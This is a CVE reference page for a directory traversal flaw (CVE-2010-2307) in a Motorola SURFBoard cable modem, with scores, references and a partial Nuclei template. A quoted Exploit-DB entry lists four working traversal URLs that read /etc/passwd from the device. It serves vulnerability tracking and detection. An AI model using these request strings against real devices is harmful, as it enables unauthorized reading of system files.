CVE-2010-2307
published 2010-06-16CVE-2010-2307: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow…
PriorityP340medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.60%
94.4th percentile
Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| motorola | surfboard_sbv6120e | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Motorola Surfboard Cable Modem - Directory Traversal
exploitdb·2010-06-03
CVE-2010-2307 Motorola Surfboard Cable Modem - Directory Traversal
Motorola Surfboard Cable Modem - Directory Traversal
---
# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :
The following urls get back the /etc/passwd file from the modem:
http://[IP]///etc/passwd
http://[IP]/../../etc/passwd
http://[IP]/..%2f..%2fetc/passwd
http://[IP]/%2e%2e/%2e%2e/etc/passwd
Nuclei
Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
nuclei·CVSS 5.0
CVE-2010-2307 [MEDIUM] Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
Template:
id: CVE-2010-2307
info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: medium
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (
No writeups or analysis indexed.
http://secunia.com/advisories/40054http://www.exploit-db.com/exploits/12865http://www.osvdb.org/65249http://www.securityfocus.com/bid/40550https://exchange.xforce.ibmcloud.com/vulnerabilities/59113http://secunia.com/advisories/40054http://www.exploit-db.com/exploits/12865http://www.osvdb.org/65249http://www.securityfocus.com/bid/40550https://exchange.xforce.ibmcloud.com/vulnerabilities/59113
2010-06-16
Published